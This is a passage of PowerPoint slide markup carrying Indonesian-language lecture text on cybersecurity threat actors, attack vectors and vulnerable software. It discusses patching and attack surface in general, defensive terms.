              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksfiltrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cenderung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merencanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kampanye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hantam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan rebut".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Aktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Vektor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lunak yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Rentan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbaiki-ditambal-secepatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh vendor. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecepatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirilis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pasar, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hampir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bebas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akibatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Banyaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
